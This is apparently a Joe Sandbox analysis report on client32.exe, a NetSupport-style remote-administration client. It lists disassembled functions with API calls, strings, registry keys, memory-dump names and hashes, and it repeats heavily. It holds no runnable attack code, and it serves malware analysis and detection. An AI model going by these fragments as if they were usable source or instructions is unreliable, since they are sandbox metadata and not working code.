                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$CloseErrorExitFolderHandleLastMessageNamePathProcessUser__strdup_fgetswsprintf
                                                                                                                                                                • String ID: IsA()$P$\Rewards.bin$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                • API String ID: 2727059318-37391384
                                                                                                                                                                • Opcode ID: 21042dabe4302790889957fcdf0b193290070831c9d0ae23097ecb091f194145
                                                                                                                                                                • Instruction ID: 9cbe2027e90b6485a44e8e4046be3e5472a02b3b41cc18688c1d521a1ff731bb
                                                                                                                                                                • Opcode Fuzzy Hash: 21042dabe4302790889957fcdf0b193290070831c9d0ae23097ecb091f194145
                                                                                                                                                                • Instruction Fuzzy Hash: 2A717E75D0071A9FDB15DBA4CC84FEEB3B8AF48308F0442D8D519A7281EB75AA44CF90
                                                                                                                                                                Function 110CD630 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 174COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 110CD68D
                                                                                                                                                                • BeginDeferWindowPos.USER32(?), ref: 110CD6D8
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 110CD703
                                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110CD730
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • NSMDlg::PositionControls(), dlg L=%d, T=%d, W=%d, H=%d, dlgdx=%d, dlgdy=%d, xrefs: 110CD6BE
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110CD673
                                                                                                                                                                • m_hWnd, xrefs: 110CD678
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Rect$BeginClientDeferErrorExitLastMessagePointsProcesswsprintf
                                                                                                                                                                • String ID: NSMDlg::PositionControls(), dlg L=%d, T=%d, W=%d, H=%d, dlgdx=%d, dlgdy=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 1318711716-1344931218
                                                                                                                                                                • Opcode ID: a4c641170c47423e8ac78e3ea5506bb8afe3d0493dba1b3bb21fb16a67788885
                                                                                                                                                                • Instruction ID: ee80f69412d45a004da56ef9482371e3e8ce3d7f15b35d2ad78fffd79bf35d29
                                                                                                                                                                • Opcode Fuzzy Hash: a4c641170c47423e8ac78e3ea5506bb8afe3d0493dba1b3bb21fb16a67788885
                                                                                                                                                                • Instruction Fuzzy Hash: 5D71E4B5E00609AFCB14CFA9D984AAEFBF5FF88714B108659E425A7744D730B841CFA0
                                                                                                                                                                Function 1100B740 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 149COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetOverlappedResult.KERNEL32(?,59FD4680,FFFFFFFF,00000001), ref: 1100B78C
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1100B796
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1100B7F9
                                                                                                                                                                • wsprintfA.USER32 ref: 1100B836
                                                                                                                                                                • ResetEvent.KERNEL32(?), ref: 1100B8EF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
                                                                                                                                                                • String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
                                                                                                                                                                • API String ID: 3598861413-432254317
                                                                                                                                                                • Opcode ID: 39ac341e869e7e4ca3b07b9f6877c66a67265ff52a029bc38a796ebafe24891f
                                                                                                                                                                • Instruction ID: 45def2f4c6c1e8bedf13dc8d5f6af1e3bd34cd83063a32ab0d32664e281c8988
                                                                                                                                                                • Opcode Fuzzy Hash: 39ac341e869e7e4ca3b07b9f6877c66a67265ff52a029bc38a796ebafe24891f
                                                                                                                                                                • Instruction Fuzzy Hash: FC51E3B8D00A1AABE710DF64CC84ABBB7F8FF48749F004519F56993281E734B980C7A5
                                                                                                                                                                Function 110595C0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 141registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,59FD48C0,00000000,00000000,757323A0,11059867,00000000,00000000), ref: 11059618
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 1105973A
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(-80000002,SOFTWARE\Productive Computer Insight\Client32\AutoReconnect,00000000,0002001F,?), ref: 110596CD
                                                                                                                                                                • RegDeleteValueA.ADVAPI32(?,?), ref: 110596ED
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 110596F7
                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 11059730
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$CloseDeleteEnterErrorEventExitLastLeaveMessageOpenProcessValuewsprintf
                                                                                                                                                                • String ID: CltReconn.cpp$SOFTWARE\Productive Computer Insight\Client32\AutoReconnect$gMain.pReconnThread
                                                                                                                                                                • API String ID: 1302350719-2578778249
                                                                                                                                                                • Opcode ID: 68027b3c7ee8842ef61d89125159b96b6acee97a4b5633a2cea115a7ef36fa4b
                                                                                                                                                                • Instruction ID: 2a435f2b6dcbcd6807d97d44f0875f24cd397b994a036d807f1c9080d97eba21
                                                                                                                                                                • Opcode Fuzzy Hash: 68027b3c7ee8842ef61d89125159b96b6acee97a4b5633a2cea115a7ef36fa4b
                                                                                                                                                                • Instruction Fuzzy Hash: 8D41E675D0461AAFD781CF74C8C0AAABBA9FB4A714F514269E925D7240F731E809CBA0
                                                                                                                                                                Function 11047160 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 330windowtimeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • IsWindow.USER32(?), ref: 11047211
                                                                                                                                                                • _malloc.LIBCMT ref: 110472AD
                                                                                                                                                                • _memmove.LIBCMT ref: 11047312
                                                                                                                                                                • SendMessageTimeoutA.USER32(?,0000004A,000802A6,00000005,00000002,00002710,?), ref: 11047372
                                                                                                                                                                • _free.LIBCMT ref: 11047379
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                  • Part of subcall function 11043870: _free.LIBCMT ref: 11043907
                                                                                                                                                                  • Part of subcall function 11043870: _free.LIBCMT ref: 11043927
                                                                                                                                                                  • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043955
                                                                                                                                                                  • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043992
                                                                                                                                                                  • Part of subcall function 11043870: _malloc.LIBCMT ref: 110439CC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
                                                                                                                                                                • String ID: IsA()$SurveyResults$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                                                                • API String ID: 3960737985-1318765656
                                                                                                                                                                • Opcode ID: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                                                                                                • Instruction ID: e7dd2455d00588b8b0596ee18c4208b20e6f9302996f578dcf6f33cfb97cf12a
                                                                                                                                                                • Opcode Fuzzy Hash: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                                                                                                • Instruction Fuzzy Hash: 18C1A374E0064A9FDB04DFE4C8D0EEEF7B5BF88308F208168D519AB295DB70A945CB90
                                                                                                                                                                Function 1102D1A0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1102D1C0
                                                                                                                                                                  • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                                                                                                  • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                                                                                                  • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                                                                                                • _memmove.LIBCMT ref: 1102D24A
                                                                                                                                                                • _memmove.LIBCMT ref: 1102D26E
                                                                                                                                                                • _memmove.LIBCMT ref: 1102D2A8
                                                                                                                                                                • _memmove.LIBCMT ref: 1102D2C4
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1102D30E
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1102D323
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                                                • String ID: deque<T> too long
                                                                                                                                                                • API String ID: 827257264-309773918
                                                                                                                                                                • Opcode ID: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                                                                                                • Instruction ID: ae58a47b93f5c67beecf59276473b3909c5d487f19c470db74dff325715f4f31
                                                                                                                                                                • Opcode Fuzzy Hash: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                                                                                                • Instruction Fuzzy Hash: DD41A476E00105ABDB04CE68CC81AEEB7FAAF94324F59C669DC09DB344E675EE05C790
                                                                                                                                                                Function 1113B570 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 151windowtimeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _strncpy.LIBCMT ref: 1113B5CF
                                                                                                                                                                • IsWindow.USER32(00000000), ref: 1113B601
                                                                                                                                                                • _malloc.LIBCMT ref: 1113B660
                                                                                                                                                                • _memmove.LIBCMT ref: 1113B6C5
                                                                                                                                                                • SendMessageTimeoutA.USER32(00000000,0000004A,000802A6,00000003,00000002,00002710,?), ref: 1113B71F
                                                                                                                                                                • _free.LIBCMT ref: 1113B726
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFreeHeapLastMessageSendTimeoutWindow_free_malloc_memmove_strncpy
                                                                                                                                                                • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                                                                • API String ID: 1602665774-2270926670
                                                                                                                                                                • Opcode ID: d2f65b4893a4b113bd1b975723f5e0f7d18ba14633015f12ae9014c407eed244
                                                                                                                                                                • Instruction ID: 0eb2f4ed3c193268d82c3344ddec75665aa68b4e15ddc527d606e76f9d1459b3
                                                                                                                                                                • Opcode Fuzzy Hash: d2f65b4893a4b113bd1b975723f5e0f7d18ba14633015f12ae9014c407eed244
                                                                                                                                                                • Instruction Fuzzy Hash: 0151B074A0110AAFDB00DF94DD81FDEF7B5FF95318F044124F919AB281EA70AA04CBA5
                                                                                                                                                                Function 110096C0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 148fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110B7920: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7946
                                                                                                                                                                  • Part of subcall function 110B7920: GetProcAddress.KERNEL32(00000000), ref: 110B794D
                                                                                                                                                                  • Part of subcall function 110B7920: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7963
                                                                                                                                                                • wsprintfA.USER32 ref: 110096FF
                                                                                                                                                                • wsprintfA.USER32 ref: 11009719
                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009803
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
                                                                                                                                                                • String ID: %s%s.htm$.%u$ApprovedWebList$Store\
                                                                                                                                                                • API String ID: 559337438-1872371932
                                                                                                                                                                • Opcode ID: af71b0923a1d4120740ce45f998e2adca2c9fc1ba50e23a94cd7c026d3225f91
                                                                                                                                                                • Instruction ID: ac38ff220fce49fe95aa0d50a934cc281f992a81e8d226226224e10aeb55a698
                                                                                                                                                                • Opcode Fuzzy Hash: af71b0923a1d4120740ce45f998e2adca2c9fc1ba50e23a94cd7c026d3225f91
                                                                                                                                                                • Instruction Fuzzy Hash: 38512631D0425E9FE715CF789894BDABBE4AB09348F0081E4D54DDB241FA31AA44CB91
                                                                                                                                                                Function 1106B250 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
